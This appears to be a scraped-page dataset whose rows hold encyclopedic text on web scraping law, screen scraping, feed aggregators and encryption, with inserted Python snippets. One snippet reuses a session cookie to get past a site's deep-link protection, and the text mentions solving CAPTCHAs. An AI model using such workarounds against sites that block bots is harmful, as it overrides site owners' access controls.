Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include BeautifulSoup, a Python library that provides simple methods for extracting data from HTML and XML files; Scrapy, an open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it; Octoparse, a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills; ParseHub, another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites; Apify, a platform that offers a wide range of scraping tools and the ability to create custom scrapers; and InstantAPI.ai, an AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattels. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot; common techniques include blocking IP addresses, serving CAPTCHAs, rate limiting requests, and obfuscating page content. |
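From the scraper's side, the usual way to coexist with such measures is to honor robots.txt and throttle the request rate. Below is a minimal sketch using the standard-library robot parser together with the requests and time imports already in this notebook; the target site and user-agent string are placeholders.
import time
import requests
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser

BASE_URL = "https://example.com"          # hypothetical site
USER_AGENT = "polite-research-bot/0.1"    # placeholder identifier

robots = RobotFileParser()
robots.set_url(urljoin(BASE_URL, "/robots.txt"))
robots.read()

def polite_get(path: str, delay: float = 2.0):
    """Fetch a path only if robots.txt allows it, then pause before returning."""
    url = urljoin(BASE_URL, path)
    if not robots.can_fetch(USER_AGENT, url):
        print(f"Skipping disallowed URL: {url}")
        return None
    response = requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=30)
    time.sleep(delay)                     # simple rate limiting between requests
    return response

# page = polite_get("/products")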
327 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Ad_hoc | Ad hoc is a Latin phrase meaning literally 'for this'. In English, it typically signifies a solution designed for a specific purpose, problem, or task rather than a generalized solution adaptable to collateral instances (compare with a priori). Common examples include ad hoc committees and commissions created at the national or international level for a specific task, and the term is often used to describe arbitration (ad hoc arbitration). In other fields, the term could refer to a military unit created under special circumstances (see task force), a handcrafted network protocol (e.g., ad hoc network), a temporary collaboration among geographically-linked franchise locations (of a given national brand) to issue advertising coupons, or a purpose-specific equation in mathematics or science. Ad hoc can also function as an adjective describing temporary, provisional, or improvised methods to deal with a particular problem, the tendency of which has given rise to the noun adhocism. 1 This concept highlights the flexibility and adaptability often required in problem-solving across various domains. In everyday language, "ad hoc" is sometimes used informally to describe improvised or makeshift solutions, emphasizing their temporary nature and specific applicability to immediate circumstances. Style guides disagree on whether Latin phrases like ad hoc should be italicized. The trend is not to use italics. 2 For example, The Chicago Manual of Style recommends that familiar Latin phrases that are listed in the Webster's Dictionary, including "ad hoc", not be italicized. 3 4 In science and philosophy, ad hoc means the addition of extraneous hypotheses to a theory to save it from being falsified. Ad hoc hypotheses compensate for anomalies not anticipated by the theory in its unmodified form. Scientists are often skeptical of scientific theories that rely on frequent, unsupported adjustments to sustain them. Ad hoc hypotheses are often characteristic of pseudo-scientific subjects such as homeopathy. 5 In the military, ad hoc units are created during unpredictable situations, when the cooperation between different units is suddenly needed for fast action, or from remnants of previous units which have been overrun or otherwise whittled down. In national and sub-national governance, ad hoc bodies may be established to deal with specific problems not easily accommodated by the current structure of governance or to address multi-faceted issues spanning several areas of governance. In the UK and other commonwealth countries, ad hoc Royal Commissions 6 may be set up to address specific questions as directed by parliament. The term ad hoc networking typically refers to a system of network elements that combine to form a network requiring little or no planning. |
328 | https://en.wikipedia.org/wiki/Web_scraping | https://de.wikipedia.org/wiki/Screen_Scraping | The term screen scraping (roughly "mining the screen") generally covers all techniques for reading text from computer screens. Today, however, the expression is used almost exclusively in reference to websites (hence also web scraping or web harvesting). In this case, screen scraping refers specifically to the techniques used to obtain information by selectively extracting the required data. Search engines use so-called crawlers to traverse the World Wide Web, analyze web pages, and collect data such as web feeds or e-mail addresses. Screen-scraping methods are also applied in web mining. To make the retrieval and further processing of information from web pages considerably easier for customers, the provider of the page content (the content provider) has the option of presenting the data not only in the form of a (human-readable) web page but also of preparing it in a machine-readable format (such as XML). Specifically requested data could then be made available to the customer as a web service for automated further processing. Frequently, however, the content provider has no interest in the mechanized retrieval of its data or in the automated use of its service (particularly with regard to special functions that should be reserved exclusively for real users), or setting up a web service would be too expensive and therefore uneconomical. In such cases, screen scraping is often used to filter the desired data out of the web page anyway. Screen scraping can be used to equip the browser with additional functions or to simplify previously cumbersome processes. For example, login procedures for forums can be automated, or services of a website can be retrieved without the user having to visit the website, for instance via a browser toolbar. Bookmarklets represent a simple form of such screen scrapers. Remixing is a technique in which web content from different services is combined into a new service (see also mashup). If no open programming interfaces are available, screen-scraping mechanisms must be used here as well. However, screen-scraping techniques can also be abused by copying content from third-party websites against the provider's will and offering it on one's own server. The training of artificial intelligence (AI) such as chatbots and image generators in particular has led to a growing contest between web scraping by commercial AI companies and countermeasures by online portals and media. 1 Screen scraping essentially consists of two steps: Ideally, the data of interest is located on a web page that can be retrieved via a URL. All parameters required to retrieve the information are passed as URL parameters (query string, see GET request). In this simple case, the web page is simply downloaded and the data is extracted with a suitable mechanism. In many cases, the parameters are requested by filling out a web form. The parameters are then often not passed in the URL but in the message body (POST request). Many websites contain personalized information. 
However, the Hypertext Transfer Protocol (HTTP) offers no native way of associating requests with a particular person. To recognize a particular person, the server application must use session concepts built on top of HTTP. A frequently used option is the transmission of session IDs through the URL or through cookies. These session concepts must be supported by a screen-scraping application. A program for extracting data from web pages is also called a wrapper. Once the web page has been downloaded, the first question for extracting the data is whether the exact location of the data on the page is known (for example, second table, third column). If this is the case, various options are available for extracting the data. The downloaded web pages can be interpreted as character strings and the desired data extracted with, for example, regular expressions. If the web page is XHTML-compliant, an XML parser can be used. There are numerous supporting technologies for accessing XML (SAX, DOM, XPath, XQuery). Often, however, web pages are delivered only in (possibly even faulty) HTML format, which does not conform to the XML standard. With a suitable parser it may nevertheless be possible to produce an XML-compliant document. Alternatively, the HTML can be cleaned up with HTML Tidy before parsing. Some screen scrapers use a query language developed specifically for HTML. One criterion for the quality of extraction mechanisms is their robustness against changes to the structure of the web page. This requires fault-tolerant extraction algorithms. In many cases, however, the structure of the web page is unknown (for example, when crawlers are used). Data structures such as prices or dates must then be recognized and interpreted even without fixed templates. A screen scraper can be installed on a dedicated web server that retrieves the requested data at regular intervals or on demand and in turn offers it in processed form. However, this server-side approach can entail legal problems and can also easily be prevented by the content provider by blocking the server's IP address. In the distributed approach, the information is retrieved directly by the client. Depending on the application, the information is stored in a database, passed on to other applications, or displayed in processed form in the browser. The distributed architecture is not only more difficult to block but also scales better. Many content providers have no interest in the isolated retrieval of specific information. One reason can be that the provider finances itself through advertisements, which can easily be filtered out by screen scraping. In addition, the content provider may have an interest in forcing the user through a particular navigation sequence. There are various strategies for protecting these interests. The server forces the user into a particular navigation sequence by using session IDs. When the traffic-routing page of the web offering is called up, a temporarily valid session ID is generated. This is transmitted via the URL, hidden form fields, or cookies. If a user or a bot reaches the page via a deep link, it cannot present a valid session ID. 
The server then redirects it to the traffic-routing page. eBay, for example, uses this strategy to prevent deep links to auction lists. A specially programmed screen scraper, however, can first obtain a valid session ID and then download the desired data. The following example shows a JavaScript-based screen scraper that circumvented the strategy used by eBay: it first downloaded the main page, extracted a valid URL with a regular expression (in this case the list of auctions in which floppy disks were being auctioned), and opened it in the browser. Besides repurposing session IDs, there are other ways of checking user behavior. All of these methods, however, involve certain problems, for example because referrer information is not mandatory, because embedded elements may be delivered by a proxy or from the cache, or because the user has simply disabled the display of graphics or the execution of JavaScript. Before delivering the data, the server tries to detect whether the client is a browser used by a human or a bot. A frequently used method for this is the use of CAPTCHAs. The client is given a task that is as easy as possible for humans but very hard for a machine to solve. This can be an arithmetic problem or typing out letters, where the difficulty for the machine often lies in recognizing the task in the first place. This can be achieved, for example, by transmitting the arithmetic problem not as text but as an image. CAPTCHAs are used for certain online services such as forums, wikis, download sites, or online networks, for instance against automatic registration, automatic spying on other users' profiles, and automatic downloads by bots. Sometimes a client only has to solve a CAPTCHA after a certain number of actions. In theory, bots can be developed for any CAPTCHA that solve these tasks on the basis of optical character recognition (extracting the task from an image), so that this protection can be circumvented. It is also possible to pass the subtask on to a human so that he or she solves the CAPTCHA for the machine. Both, however, mean considerable additional effort for the bot operator. The information can also be offered in a form that machines cannot read, or can read only with difficulty, for example as graphics, in Flash animations, or in Java applets; however, usability often suffers as a result. JavaScript can also be used to obfuscate the data. This method is used above all against e-mail harvesters that collect e-mail addresses for sending spam. The actual data is not transmitted in the HTML code but is only written into the web page by JavaScript. The data can additionally be transmitted in encrypted form and only decrypted when the page is displayed. With the help of an obfuscator, the program code can be obscured in order to make the development of a screen scraper more difficult. A simple example of obfuscating an e-mail address with JavaScript (without encryption): Depending on the complexity of the task, a screen scraper has to be reprogrammed. With the help of toolkits, however, screen scrapers can also be created without programming knowledge. 
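In the spirit of the session-ID workaround described above, here is a Python sketch using requests.Session: visiting the entry page first lets the server set its session cookie, which the session object then re-sends automatically on the deep link. The URLs are placeholders, not a real site.
import requests

session = requests.Session()
session.headers.update({"User-Agent": "example-scraper/0.1"})

# Hypothetical entry page that issues a session cookie (the "traffic-routing" page).
ENTRY_URL = "https://example.com/"
DATA_URL = "https://example.com/listings?page=1"

# Visiting the entry page first lets the server set its session cookie...
session.get(ENTRY_URL, timeout=30)
print("Cookies received:", session.cookies.get_dict())

# ...which the Session object automatically re-sends on the deep link.
response = session.get(DATA_URL, timeout=30)
print(response.status_code, len(response.text), "bytes")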
There are various options for the form of implementation, for example as a library, as a proxy server, or as a standalone program. Piggy Bank was an extension for Firefox developed by the Simile project at MIT. It could be used to link services from different providers. It automatically recognized RDF resources offered on a web page. These could be stored, managed, and combined with other services (for example, geographic information with Google Maps). Piggy Bank is no longer offered. Selenium 2 offers itself as a replacement, with which a web browser such as Firefox can be controlled programmatically. Another well-known Firefox extension is Greasemonkey. It allows the user to run custom JavaScript files in the browser, which can customize the appearance and behavior of the displayed web page without requiring access to the website itself. This makes it possible, for example, to extend websites with additional functions, fix display errors, embed content from other websites, and automatically carry out recurring tasks. A9 by Amazon is an example of a centralized remix architecture. A9 can display search results from various web services such as Windows Live, Wikipedia, answers.com, and many others in one window. Programmers often use scripting languages for customized screen-scraping projects. For Python, for example, there is the Beautiful Soup library, 3 which makes it easier to deal with real-world HTML. Also based on Python is the domain-specific language redex (Regular Document Expressions) 4 by Marcin Wojnarski, which was created specifically for web scraping and is intended to close the gap between the practical but fine-grained regular expressions and the powerful but very rigid XPath syntax. 5 When scraping websites of third-party providers, compliance with copyright law must be observed, especially if the content is embedded in one's own offering. A legal gray area, on the other hand, is the offering of programs that enable client-side screen scraping. Some providers also explicitly prohibit the automatic reading of data in their terms of use. 6 Another potential problem is the hiding of information, for example of advertising or legally relevant information such as disclaimers and warnings, or even the automatic acceptance of the terms and conditions by the screen scraper, without the user ever seeing them. |
329 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit&section=3 | [Wikipedia edit page returned an IP-range block notice instead of article content; nothing was scraped from this URL.] |
330 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=info | [Wikipedia page-information screen; only hidden-category and transclusion metadata, no article content.] |
331 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Comparison_of_feed_aggregators | The following is a comparison of RSS feed aggregators. Often e-mail programs and web browsers have the ability to display RSS feeds, so they are listed here too. Many BitTorrent clients support RSS feeds for broadcasting (see Comparison of BitTorrent clients). With the rise of cloud computing, some cloud-based services offer feed aggregation; they are listed here as well. [Flattened release-version table; the recoverable entries are 6.5.6 (May 13, 2024), 4.8.6 (May 13, 2024), 4.7.9 (March 2, 2021), 4.14.3 (May 30, 2024), and 3.7.6 (May 28, 2024), but the associated product names were lost in extraction.] Netscape Messenger 9 is a fork of Mozilla Thunderbird and has the same features. Web browsers and Internet suites are listed with N/A for browser plugin, because they do not need one. |
332 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Encryption | In cryptography, encryption is the process of transforming (more specifically, encoding) information in a way that, ideally, only authorized parties can decode. This process converts the original representation of the information, known as plaintext, into an alternative form known as ciphertext. Despite its goal, encryption does not itself prevent interference but denies the intelligible content to a would-be interceptor. For technical reasons, an encryption scheme usually uses a pseudo-random encryption key generated by an algorithm. It is possible to decrypt the message without possessing the key but, for a well-designed encryption scheme, considerable computational resources and skills are required. An authorized recipient can easily decrypt the message with the key provided by the originator to recipients but not to unauthorized users. Historically, various forms of encryption have been used to aid in cryptography. Early encryption techniques were often used in military messaging. Since then, new techniques have emerged and become commonplace in all areas of modern computing. 1 Modern encryption schemes use the concepts of public-key and symmetric-key. 1 Modern encryption techniques ensure security because modern computers are inefficient at cracking the encryption. One of the earliest forms of encryption is symbol replacement, which was first found in the tomb of Khnumhotep II, who lived in Egypt around 1900 BC. Symbol replacement encryption is "non-standard," which means that the symbols require a cipher or key to understand. This type of early encryption was used throughout Ancient Greece and Rome for military purposes. 2 One of the most famous military encryption developments was the Caesar cipher, a system in which a letter in normal text is shifted a fixed number of positions down the alphabet to get the encoded letter. A message encoded with this type of encryption could be decoded with the fixed number on the Caesar cipher. 3 Around 800 AD, Arab mathematician Al-Kindi developed the technique of frequency analysis, which was an attempt to systematically crack ciphers, including the Caesar cipher. 2 This technique looked at the frequency of letters in the encrypted message to determine the appropriate shift. This technique was rendered ineffective after the creation of the polyalphabetic cipher, described by Al-Qalqashandi (1355-1418) 4 and Leon Battista Alberti (in 1465), which incorporated different sets of languages. In order for frequency analysis to be useful, the person trying to decrypt the message would need to know which language the sender chose. 2 Around 1790, Thomas Jefferson theorized a cipher to encode and decode messages in order to provide a more secure way of military correspondence. The cipher, known today as the Wheel Cipher or the Jefferson Disk, although never actually built, was theorized as a spool that could jumble an English message up to 36 characters. The message could be decrypted by plugging in the jumbled message to a receiver with an identical cipher. 5 A similar device to the Jefferson Disk, the M-94, was developed in 1917 independently by US Army Major Joseph Mauborgne. This device was used in U.S. military communications until 1942. 6 In World War II, the Axis powers used a more advanced version of the M-94 called the Enigma Machine. 
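Referring back to the Caesar cipher described earlier in this passage, here is a worked sketch of the shift operation in Python; the shift of 3 is the classical textbook value, not something asserted by the article.
def caesar(text: str, shift: int) -> str:
    """Shift each letter by `shift` positions; non-letters pass through unchanged."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)

encoded = caesar("ATTACK AT DAWN", 3)   # -> "DWWDFN DW GDZQ"
decoded = caesar(encoded, -3)           # shifting back recovers the plaintext
print(encoded, "->", decoded)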
The Enigma Machine was more complex because unlike the Jefferson Wheel and the M-94, each day the jumble of letters switched to a completely new combination. Each day's combination was only known by the Axis, so many thought the only way to break the code would be to try over 17,000 combinations within 24 hours. 7 The Allies used computing power to severely limit the number of reasonable combinations they needed to check every day, leading to the breaking of the Enigma Machine. Today, encryption is used in the transfer of communication over the Internet for security and commerce. 1 As computing power continues to increase, computer encryption is constantly evolving to prevent eavesdropping attacks. 8 One of the first "modern" cipher suites, DES, which used a 56-bit key with 72,057,594,037,927,936 possible keys, was cracked in 22 hours and 15 minutes by EFF's DES cracker in 1999, which used a brute-force method of cracking. Modern encryption standards often use stronger key sizes, often 256-bit, like AES (256-bit mode), Twofish, ChaCha20-Poly1305, and Serpent (configurable up to 512-bit). Cipher suites utilizing a 128-bit or higher key, like AES, will not be able to be brute-forced, because the total number of keys is about 3.4 × 10^38. The most likely option for cracking ciphers with high key size is to find vulnerabilities in the cipher itself, like inherent biases and backdoors, or by exploiting physical side effects through side-channel attacks. For example, RC4, a stream cipher, was cracked due to inherent biases and vulnerabilities in the cipher. In the context of cryptography, encryption serves as a mechanism to ensure confidentiality. 1 Since data may be visible on the Internet, sensitive information such as passwords and personal communication may be exposed to potential interceptors. 1 The process of encrypting and decrypting messages involves keys. The two main types of keys in cryptographic systems are symmetric-key and public-key (also known as asymmetric-key). 9 10 Many complex cryptographic algorithms often use simple modular arithmetic in their implementations. 11 In symmetric-key schemes, 12 the encryption and decryption keys are the same. Communicating parties must have the same key in order to achieve secure communication. The German Enigma Machine utilized a new symmetric key each day for encoding and decoding messages. In public-key encryption schemes, the encryption key is published for anyone to use and encrypt messages. However, only the receiving party has access to the decryption key that enables messages to be read. 13 Public-key encryption was first described in a secret document in 1973; 14 beforehand, all encryption schemes were symmetric-key (also called private-key). 15 : 478 Although published subsequently, the work of Diffie and Hellman was published in a journal with a large readership, and the value of the methodology was explicitly described. 16 The method became known as the Diffie-Hellman key exchange. RSA (Rivest-Shamir-Adleman) is another notable public-key cryptosystem. Created in 1978, it is still used today for applications involving digital signatures. 17 Using number theory, the RSA algorithm selects two prime numbers, which help generate both the encryption and decryption keys. 18 A publicly available public-key encryption application called Pretty Good Privacy (PGP) was written in 1991 by Phil Zimmermann, and distributed free of charge with source code. PGP was purchased by Symantec in 2010 and is regularly updated. 
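The key-space figures quoted above are easy to reproduce with two lines of arithmetic; the snippet below simply recomputes the numbers cited in the text (2^56 for DES and roughly 3.4 × 10^38 for a 128-bit key).
# Number of possible keys grows exponentially with key length.
des_keys = 2 ** 56          # DES key space
aes128_keys = 2 ** 128      # 128-bit key space (e.g. AES-128)

print(f"56-bit key space:  {des_keys:,}")       # 72,057,594,037,927,936
print(f"128-bit key space: {aes128_keys:.7e}")  # about 3.4028237e+38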
19 Encryption has long been used by militaries and governments to facilitate secret communication. It is now commonly used in protecting information within many kinds of civilian systems. For example, the Computer Security Institute reported that in 2007, 71% of companies surveyed utilized encryption for some of their data in transit, and 53% utilized encryption for some of their data in storage. 20 Encryption can be used to protect data "at rest", such as information stored on computers and storage devices (e.g. USB flash drives). In recent years, there have been numerous reports of confidential data, such as customers' personal records, being exposed through loss or theft of laptops or backup drives; encrypting such files at rest helps protect them if physical security measures fail. 21 22 23 Digital rights management systems, which prevent unauthorized use or reproduction of copyrighted material and protect software against reverse engineering (see also copy protection), are another somewhat different example of using encryption on data at rest. 24 Encryption is also used to protect data in transit, for example data being transferred via networks (e.g. the Internet, e-commerce), mobile telephones, wireless microphones, wireless intercom systems, Bluetooth devices and bank automatic teller machines. There have been numerous reports of data in transit being intercepted in recent years. 25 Data should also be encrypted when transmitted across networks in order to protect against eavesdropping of network traffic by unauthorized users. 26 Conventional methods for permanently deleting data from a storage device involve overwriting the device's whole content with zeros, ones, or other patterns, a process which can take a significant amount of time, depending on the capacity and the type of storage medium. Cryptography offers a way of making the erasure almost instantaneous. This method is called crypto-shredding. An example implementation of this method can be found on iOS devices, where the cryptographic key is kept in a dedicated 'effaceable storage'. 27 Because the key is stored on the same device, this setup on its own does not offer full privacy or security protection if an unauthorized person gains physical access to the device. Encryption is used in the 21st century to protect digital data and information systems. As computing power increased over the years, encryption technology has only become more advanced and secure. However, this advancement in technology has also exposed a potential limitation of today's encryption methods. The length of the encryption key is an indicator of the strength of the encryption method. 28 For example, the original encryption standard, DES (Data Encryption Standard), used a 56-bit key, meaning it had 2^56 possible combinations. With today's computing power, a 56-bit key is no longer secure, being vulnerable to brute force attacks. 29 Quantum computing utilizes properties of quantum mechanics in order to process large amounts of data simultaneously. Quantum computing has been found to achieve computing speeds thousands of times faster than today's supercomputers. 30 This computing power presents a challenge to today's encryption technology. For example, RSA encryption utilizes the multiplication of very large prime numbers to create a semiprime number for its public key. Decoding this key without its private key requires this semiprime number to be factored, which can take a very long time to do with modern computers. 
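To make the preceding RSA description concrete, here is a toy sketch with deliberately tiny textbook primes (p = 61, q = 53). Recovering the private exponent from the public values would require factoring n, which is trivial at this size but infeasible at real key sizes; this illustrates the arithmetic only and is not a usable implementation.
# Toy RSA with textbook-sized numbers (never use such small keys in practice).
p, q = 61, 53
n = p * q                      # 3233, the public modulus (a semiprime)
phi = (p - 1) * (q - 1)        # 3120
e = 17                         # public exponent, coprime with phi
d = pow(e, -1, phi)            # 2753, private exponent (modular inverse, Python 3.8+)

message = 65                   # a message encoded as an integer smaller than n
ciphertext = pow(message, e, n)        # encryption: m^e mod n
recovered = pow(ciphertext, d, n)      # decryption: c^d mod n

print(ciphertext, recovered)   # 2790 65 -> the original message is recovered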
It would take a supercomputer anywhere between weeks to months to factor this key. citation needed However, quantum computing can use quantum algorithms to factor this semiprime number in the same amount of time it takes for normal computers to generate it. This would make all data protected by current public-key encryption vulnerable to quantum computing attacks. 31 Other encryption techniques like elliptic curve cryptography and symmetric key encryption are also vulnerable to quantum computing. citation needed While quantum computing could be a threat to encryption security in the future, quantum computing as it currently stands is still very limited. Quantum computing currently is not commercially available, cannot handle large amounts of code, and only exists as computational devices, not computers. 32 Furthermore, quantum computing advancements will be able to be utilized in favor of encryption as well. The National Security Agency (NSA) is currently preparing post-quantum encryption standards for the future. 33 Quantum encryption promises a level of security that will be able to counter the threat of quantum computing. 32 Encryption is an important tool but is not sufficient alone to ensure the security or privacy of sensitive information throughout its lifetime. Most applications of encryption protect information only at rest or in transit, leaving sensitive data in clear text and potentially vulnerable to improper disclosure during processing, such as by a cloud service for example. Homomorphic encryption and secure multi-party computation are emerging techniques to compute on encrypted data; these techniques are general and Turing complete but incur high computational and/or communication costs. In response to encryption of data at rest, cyber-adversaries have developed new types of attacks. These more recent threats to encryption of data at rest include cryptographic attacks, 34 stolen ciphertext attacks, 35 attacks on encryption keys, 36 insider attacks, data corruption or integrity attacks, 37 data destruction attacks, and ransomware attacks. Data fragmentation 38 and active defense 39 data protection technologies attempt to counter some of these attacks by distributing, moving, or mutating ciphertext so it is more difficult to identify, steal, corrupt, or destroy. 40 The question of balancing the need for national security with the right to privacy has been debated for years, since encryption has become critical in today's digital society. The modern encryption debate 41 started around the 1990s, when the US government tried to ban cryptography because, according to it, this would threaten national security. The debate is polarized around two opposing views: those who see strong encryption as a problem because it makes it easier for criminals to hide their illegal acts online, and those who argue that encryption keeps digital communications safe. The debate heated up in 2014, when big technology companies like Apple and Google enabled encryption by default on their devices. This was the start of a series of controversies that pits governments, companies and internet users against one another. Encryption, by itself, can protect the confidentiality of messages, but other techniques are still needed to protect the integrity and authenticity of a message; for example, verification of a message authentication code (MAC) or a digital signature, usually done by a hashing algorithm or a PGP signature. Authenticated encryption algorithms are designed to provide both encryption and integrity protection together. 
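To make the RSA and semiprime discussion above concrete, here is a deliberately tiny, insecure sketch in plain Python: the public modulus is the product of two primes, and anyone who can factor it can rebuild the private key, which is precisely the step a quantum factoring algorithm would accelerate. The primes and message are toy values chosen only for illustration.
# Toy RSA sketch (illustration only; real keys use primes hundreds of digits long).
p, q = 61, 53                 # two tiny primes
n = p * q                     # 3233, the public semiprime modulus
phi = (p - 1) * (q - 1)       # Euler's totient of n
e = 17                        # public exponent, coprime with phi
d = pow(e, -1, phi)           # private exponent: modular inverse of e (Python 3.8+)

message = 42
ciphertext = pow(message, e, n)     # encrypt with the public key (e, n)
recovered = pow(ciphertext, d, n)   # decrypt with the private key (d, n)
assert recovered == message

# An attacker who factors n back into p and q can recompute phi and d,
# which is why fast factoring breaks RSA.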
